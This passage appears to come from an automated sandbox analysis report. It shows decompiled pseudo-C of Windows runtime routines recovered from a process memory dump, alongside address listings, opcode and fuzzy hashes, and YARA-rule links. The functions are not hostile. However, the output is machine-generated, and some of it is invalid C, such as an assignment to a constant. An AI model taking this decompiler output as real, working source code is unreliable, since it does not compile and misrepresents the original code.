					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                      0x01685142
                                                      0x0168514c
                                                      0x01685150
                                                      0x01685157
                                                      0x01685159
                                                      0x0168515e
                                                      0x01685165
                                                      0x01685169
                                                      0x0168516c
                                                      0x01685172
                                                      0x01685176
                                                      0x0168517a
                                                      0x0168517a
                                                      0x0168517a
                                                      0x0168517f
                                                      0x016c6d8b
                                                      0x016c6d8e
                                                      0x016c6d91
                                                      0x016c6d95
                                                      0x016c6d98
                                                      0x016c6d9c
                                                      0x016c6da0
                                                      0x016c6da3
                                                      0x016c6da7
                                                      0x016c6e26
                                                      0x016c6e26
                                                      0x016c6e2a
                                                      0x016851f9
                                                      0x016851f9
                                                      0x016851fe
                                                      0x016c6e33
                                                      0x016c6e33
                                                      0x016c6e39
                                                      0x016c6e3d
                                                      0x016c6e46
                                                      0x016c6e50
                                                      0x00000000
                                                      0x00000000
                                                      0x016c6e52
                                                      0x016c6e53
                                                      0x016c6e56
                                                      0x016c6e5d
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x016c6e5f
                                                      0x016c6e67
                                                      0x016c6e77
                                                      0x016c6e7f
                                                      0x016c6e80
                                                      0x016c6e88
                                                      0x016c6e90
                                                      0x016c6e9f
                                                      0x016c6ea5
                                                      0x016c6ea9
                                                      0x016c6eb1
                                                      0x016c6ebf
                                                      0x00000000
                                                      0x00000000
                                                      0x016c6ecf
                                                      0x016c6ed3
                                                      0x00000000
                                                      0x00000000
                                                      0x016c6edb
                                                      0x016c6ede
                                                      0x016c6ee1
                                                      0x016c6ee8
                                                      0x016c6eeb
                                                      0x016c6eed
                                                      0x016c6ef0
                                                      0x016c6ef4
                                                      0x016c6ef8
                                                      0x016c6efc
                                                      0x00000000
                                                      0x00000000
                                                      0x016c6f0d
                                                      0x016c6f11
                                                      0x016c6f32
                                                      0x016c6f37
                                                      0x016c6f3b
                                                      0x016c6f3e
                                                      0x016c6f41
                                                      0x016c6f46
                                                      0x00000000
                                                      0x00000000
                                                      0x016c6f4c
                                                      0x016c6f50
                                                      0x016c6f50
                                                      0x016c6f54
                                                      0x016c6f62
                                                      0x016c6f65
                                                      0x016c6f6d
                                                      0x016c6f7b
                                                      0x016c6f7b
                                                      0x016c6f93
                                                      0x016c6f98
                                                      0x016c6fa0
                                                      0x016c6fa6
                                                      0x016c6fb3
                                                      0x016c6fb6
                                                      0x016c6fbf
                                                      0x016c6fc1
                                                      0x016c6fd5
                                                      0x016c6fda
                                                      0x016c6fda
                                                      0x016c6fdd
                                                      0x016c6fe2
                                                      0x016c6fe7
                                                      0x016c6feb
                                                      0x016c6fef
                                                      0x016c6ff3
                                                      0x0168520c
                                                      0x0168520c
                                                      0x0168520f
                                                      0x01685215
                                                      0x01685234
                                                      0x0168523a
                                                      0x0168523a
                                                      0x01685244
                                                      0x01685245
                                                      0x01685246
                                                      0x01685251
                                                      0x01685251
                                                      0x016c6f13
                                                      0x016c6f17
                                                      0x016c6f17
                                                      0x016c6f18
                                                      0x016c6f1b
                                                      0x016c6f1f
                                                      0x016c6f23
                                                      0x00000000
                                                      0x016c6f28
                                                      0x01685204
                                                      0x01685204
                                                      0x01685208
                                                      0x00000000
                                                      0x01685208
                                                      0x01685185
                                                      0x01685188
                                                      0x0168518a
                                                      0x0168518e
                                                      0x01685195
                                                      0x016c6db1
                                                      0x016c6db5
                                                      0x016c6db9
                                                      0x0168519b
                                                      0x0168519b
                                                      0x0168519e
                                                      0x016851a7
                                                      0x016851a9
                                                      0x016851a9
                                                      0x016851b5
                                                      0x016851b8
                                                      0x016851bb
                                                      0x016851be
                                                      0x016851c1
                                                      0x016851c5
                                                      0x016851c9
                                                      0x016851cd
                                                      0x016851cd
                                                      0x016851d8
                                                      0x016851dc
                                                      0x016851e0
                                                      0x016c6dcc
                                                      0x016c6dd0
                                                      0x016c6dd5
                                                      0x016c6ddd
                                                      0x016c6de1
                                                      0x016c6de1
                                                      0x016c6de5
                                                      0x016c6deb
                                                      0x016c6df1
                                                      0x016c6df7
                                                      0x016c6dfd
                                                      0x016c6e01
                                                      0x016c6e05
                                                      0x016c6e09
                                                      0x016c6e0d
                                                      0x016c6e11
                                                      0x016c6e11
                                                      0x016851eb
                                                      0x016c6e1a
                                                      0x016c6e1f
                                                      0x016c6e21
                                                      0x016c6e23
                                                      0x00000000
                                                      0x016851f1
                                                      0x016851f1
                                                      0x00000000
                                                      0x016851f1

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 27b06ce0a07beea04c22d6f2f0c99a15ed9690850f54802c942d743b8d5d5f0d
                                                      • Instruction ID: d7528be434ef307a157c7ac313ae8e779c69d1f2a5f6cad2e69e3fd4a97930c7
                                                      • Opcode Fuzzy Hash: 27b06ce0a07beea04c22d6f2f0c99a15ed9690850f54802c942d743b8d5d5f0d
                                                      • Instruction Fuzzy Hash: 26C122755083818FD354CF28C990A6AFBE1FF88704F148A6EF9998B352D771E845CB46
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016803E2, Relevance: .3, Instructions: 254COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 74%
                                                      			E016803E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x174d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E01680548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0169B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0166B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x1747c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E01677D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E01677D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E016D7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E01699830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E016D69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x1747c04 != 0) {
						_t118 = _v12;
						_t120 = E016DA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x1747bd8;
						if( *0x1747bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E016995D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E016999A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E016D3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0165B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0169AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x1748474 - 3;
										if( *0x1748474 != 3) {
											 *0x17479dc =  *0x17479dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E01677D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E01677D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E016D7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x1748708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x1747b00; // 0x0
							asm("ror esi, cl");
							 *0x174b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E016995D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E01667F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                      0x016803f1
                                                      0x016803f7
                                                      0x016803f9
                                                      0x016803fb
                                                      0x016803fd
                                                      0x01680400
                                                      0x0168040a
                                                      0x016c4c7a
                                                      0x01680537
                                                      0x01680547
                                                      0x01680410
                                                      0x01680410
                                                      0x01680414
                                                      0x01680417
                                                      0x0168041a
                                                      0x01680421
                                                      0x01680424
                                                      0x0168042b
                                                      0x0168043b
                                                      0x0168043e
                                                      0x0168043f
                                                      0x0168043f
                                                      0x01680446
                                                      0x01680449
                                                      0x0168044c
                                                      0x0168044f
                                                      0x01680459
                                                      0x016c4c8d
                                                      0x0168045f
                                                      0x0168045f
                                                      0x0168045f
                                                      0x01680467
                                                      0x016c4c97
                                                      0x016c4c9d
                                                      0x016c4ca4
                                                      0x016c4caa
                                                      0x016c4caf
                                                      0x016c4cb1
                                                      0x016c4cc3
                                                      0x016c4cb3
                                                      0x016c4cbc
                                                      0x016c4cbc
                                                      0x016c4cc8
                                                      0x016c4ccb
                                                      0x016c4cd7
                                                      0x016c4cda
                                                      0x016c4cdf
                                                      0x016c4cdf
                                                      0x016c4ccb
                                                      0x016c4ca4
                                                      0x0168046d
                                                      0x0168046f
                                                      0x0168046f
                                                      0x01680471
                                                      0x01680476
                                                      0x0168047a
                                                      0x0168047b
                                                      0x01680483
                                                      0x01680489
                                                      0x0168048d
                                                      0x00000000
                                                      0x00000000
                                                      0x016c4ce9
                                                      0x016c4cef
                                                      0x016c4d22
                                                      0x016c4d22
                                                      0x00000000
                                                      0x016c4d22
                                                      0x016c4cf1
                                                      0x016c4cf7
                                                      0x00000000
                                                      0x00000000
                                                      0x016c4cf9
                                                      0x016c4cff
                                                      0x00000000
                                                      0x00000000
                                                      0x016c4d05
                                                      0x016c4d07
                                                      0x00000000
                                                      0x00000000
                                                      0x016c4d0d
                                                      0x016c4d0f
                                                      0x016c4d14
                                                      0x016c4d16
                                                      0x00000000
                                                      0x00000000
                                                      0x016c4d1c
                                                      0x016c4d1c
                                                      0x01680499
                                                      0x01680535
                                                      0x01680535
                                                      0x00000000
                                                      0x01680535
                                                      0x016804a6
                                                      0x016c4d2c
                                                      0x016c4d37
                                                      0x016c4d39
                                                      0x016c4d3b
                                                      0x00000000
                                                      0x00000000
                                                      0x016c4d41
                                                      0x016c4d48
                                                      0x01680527
                                                      0x0168052b
                                                      0x0168052d
                                                      0x01680530
                                                      0x01680530
                                                      0x00000000
                                                      0x0168052b
                                                      0x016c4d4e
                                                      0x016804ac
                                                      0x016804ac
                                                      0x016804af
                                                      0x016804b2
                                                      0x016804b7
                                                      0x016804b9
                                                      0x016804bb
                                                      0x016804bd
                                                      0x016804bf
                                                      0x016804c5
                                                      0x016804c9
                                                      0x016c4d53
                                                      0x016c4d59
                                                      0x016c4db9
                                                      0x016c4dba
                                                      0x016c4dbf
                                                      0x016c4dc2
                                                      0x016c4dc4
                                                      0x016c4dc7
                                                      0x016c4dce
                                                      0x00000000
                                                      0x016c4dce
                                                      0x016c4d5b
                                                      0x016c4d61
                                                      0x00000000
                                                      0x00000000
                                                      0x016c4d63
                                                      0x016c4d69
                                                      0x00000000
                                                      0x00000000
                                                      0x016c4d6b
                                                      0x016c4d6e
                                                      0x016c4d74
                                                      0x016c4d76
                                                      0x016c4d7c
                                                      0x016c4d7e
                                                      0x016c4d84
                                                      0x016c4d89
                                                      0x016c4d8c
                                                      0x016c4d8d
                                                      0x016c4d92
                                                      0x016c4d95
                                                      0x016c4d96
                                                      0x016c4d98
                                                      0x016c4d9a
                                                      0x016c4d9f
                                                      0x016c4da4
                                                      0x016c4da6
                                                      0x016c4da8
                                                      0x016c4daf
                                                      0x016c4db1
                                                      0x016c4db1
                                                      0x016c4daf
                                                      0x016c4da6
                                                      0x016c4d84
                                                      0x016c4d7c
                                                      0x00000000
                                                      0x016c4d74
                                                      0x016804d6
                                                      0x016c4de1
                                                      0x016804dc
                                                      0x016804dc
                                                      0x016804dc
                                                      0x016804e4
                                                      0x016c4deb
                                                      0x016c4df1
                                                      0x016c4df8
                                                      0x016c4dfe
                                                      0x016c4e03
                                                      0x016c4e05
                                                      0x016c4e17
                                                      0x016c4e07
                                                      0x016c4e10
                                                      0x016c4e10
                                                      0x016c4e1c
                                                      0x016c4e1f
                                                      0x016c4e35
                                                      0x016c4e35
                                                      0x016c4e1f
                                                      0x016c4df8
                                                      0x016804f1
                                                      0x016804fa
                                                      0x016c4e3f
                                                      0x016c4e47
                                                      0x016c4e5b
                                                      0x016c4e61
                                                      0x016c4e67
                                                      0x016c4e69
                                                      0x016c4e71
                                                      0x016c4e73
                                                      0x01680500
                                                      0x01680500
                                                      0x01680500
                                                      0x016804fa
                                                      0x01680508
                                                      0x0168051d
                                                      0x0168051d
                                                      0x0168051f
                                                      0x01680524
                                                      0x00000000
                                                      0x01680524
                                                      0x01680515
                                                      0x01680517
                                                      0x016c4e7a
                                                      0x016c4e7c
                                                      0x00000000
                                                      0x00000000
                                                      0x016c4e85
                                                      0x00000000
                                                      0x016c4e85
                                                      0x00000000
                                                      0x01680517

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6ba103f16bd8de7416a8ba98eb1fca44fcfe8d4c30466b039ce3ed639841e385
                                                      • Instruction ID: afb0a07bceea3583f32a2d35156d14188c12aa0e270e13a7101dd41028830be6
                                                      • Opcode Fuzzy Hash: 6ba103f16bd8de7416a8ba98eb1fca44fcfe8d4c30466b039ce3ed639841e385
                                                      • Instruction Fuzzy Hash: E7910332E00215ABEB31EA6CCC54BBD7BA5EB05B24F050769FA10AB2D1DB749C44C795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0165C600, Relevance: .2, Instructions: 225COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 67%
                                                      			E0165C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x174d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E01666D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0169B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x1747b9c; // 0x0
					_t74 = L01674620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E01699650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L016777F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0169F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E016913C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L016777F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E01699650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                      0x0165c608
                                                      0x0165c615
                                                      0x0165c625
                                                      0x0165c62d
                                                      0x0165c635
                                                      0x0165c640
                                                      0x0165c680
                                                      0x0165c687
                                                      0x0165c688
                                                      0x0165c689
                                                      0x0165c694
                                                      0x0165c694
                                                      0x0165c642
                                                      0x0165c64a
                                                      0x0165c697
                                                      0x016c7a25
                                                      0x016c7a2b
                                                      0x016c7a2e
                                                      0x016c7a30
                                                      0x016c7bea
                                                      0x016c7bea
                                                      0x00000000
                                                      0x016c7bea
                                                      0x016c7a36
                                                      0x016c7a43
                                                      0x016c7a48
                                                      0x016c7a4c
                                                      0x016c7a4e
                                                      0x00000000
                                                      0x00000000
                                                      0x016c7a58
                                                      0x016c7a5a
                                                      0x016c7a5b
                                                      0x016c7a5c
                                                      0x016c7a5d
                                                      0x016c7a63
                                                      0x016c7a64
                                                      0x016c7a6a
                                                      0x016c7a6c
                                                      0x016c7a6e
                                                      0x016c79cb
                                                      0x016c79cb
                                                      0x016c79ce
                                                      0x016c79d0
                                                      0x016c7a98
                                                      0x016c7a9b
                                                      0x016c7a9b
                                                      0x016c7a9e
                                                      0x016c7aa1
                                                      0x016c7bbe
                                                      0x016c7bbe
                                                      0x016c7bc0
                                                      0x016c7be0
                                                      0x016c7be0
                                                      0x016c7a01
                                                      0x016c7a01
                                                      0x016c7a05
                                                      0x016c7a07
                                                      0x016c7a15
                                                      0x016c7a15
                                                      0x016c7a1a
                                                      0x00000000
                                                      0x016c7a1a
                                                      0x016c7bc2
                                                      0x016c7bc6
                                                      0x016c7bc9
                                                      0x016c7bcd
                                                      0x016c7bcf
                                                      0x016c79e6
                                                      0x016c79e6
                                                      0x016c79eb
                                                      0x016c79eb
                                                      0x016c79ef
                                                      0x016c79f1
                                                      0x00000000
                                                      0x00000000
                                                      0x016c79f3
                                                      0x016c79f5
                                                      0x016c79ff
                                                      0x016c79ff
                                                      0x00000000
                                                      0x016c79ff
                                                      0x016c79f7
                                                      0x016c79fd
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x016c79fd
                                                      0x016c7bd5
                                                      0x016c7bd8
                                                      0x00000000
                                                      0x00000000
                                                      0x016c7ba9
                                                      0x016c7bac
                                                      0x016c7bb0
                                                      0x016c7bb1
                                                      0x016c7bb1
                                                      0x016c7bb6
                                                      0x00000000
                                                      0x016c7bb6
                                                      0x016c7aa7
                                                      0x016c7aaa
                                                      0x00000000
                                                      0x00000000
                                                      0x016c7ab2
                                                      0x016c7ab3
                                                      0x016c7ab5
                                                      0x016c7aec
                                                      0x016c7aef
                                                      0x016c7b25
                                                      0x016c7b28
                                                      0x016c7b62
                                                      0x016c7b64
                                                      0x016c7b8f
                                                      0x016c7b92
                                                      0x016c7b96
                                                      0x016c7b98
                                                      0x00000000
                                                      0x00000000
                                                      0x016c7b9e
                                                      0x016c7b9f
                                                      0x016c7ba3
                                                      0x00000000
                                                      0x016c7ba3
                                                      0x016c7b66
                                                      0x016c7b68
                                                      0x016c7ae2
                                                      0x016c7ae2
                                                      0x00000000
                                                      0x016c7ae2
                                                      0x016c7b6e
                                                      0x016c7b72
                                                      0x016c7b75
                                                      0x016c7b81
                                                      0x016c7b85
                                                      0x016c7b87
                                                      0x00000000
                                                      0x00000000
                                                      0x016c7b31
                                                      0x016c7b34
                                                      0x016c7b3c
                                                      0x016c7b45
                                                      0x016c7b46
                                                      0x016c7b4f
                                                      0x016c7b51
                                                      0x016c7b57
                                                      0x016c7b59
                                                      0x016c7b59
                                                      0x00000000
                                                      0x016c7b59
                                                      0x016c7b77
                                                      0x00000000
                                                      0x016c7b77
                                                      0x016c7b2a
                                                      0x00000000
                                                      0x016c7b2a
                                                      0x016c7af1
                                                      0x016c7af3
                                                      0x00000000
                                                      0x00000000
                                                      0x016c7afb
                                                      0x016c7afc
                                                      0x016c7afe
                                                      0x00000000
                                                      0x00000000
                                                      0x016c7b00
                                                      0x016c7b03
                                                      0x00000000
                                                      0x00000000
                                                      0x016c7b05
                                                      0x016c7b09
                                                      0x016c7b0d
                                                      0x016c7b0f
                                                      0x00000000
                                                      0x00000000
                                                      0x016c7b18
                                                      0x016c7b1d
                                                      0x00000000
                                                      0x016c7b1d
                                                      0x016c7ab7
                                                      0x016c7ab9
                                                      0x00000000
                                                      0x00000000
                                                      0x016c7abf
                                                      0x016c7ac1
                                                      0x00000000
                                                      0x00000000
                                                      0x016c7ac3
                                                      0x016c7ac6
                                                      0x00000000
                                                      0x00000000
                                                      0x016c7ac8
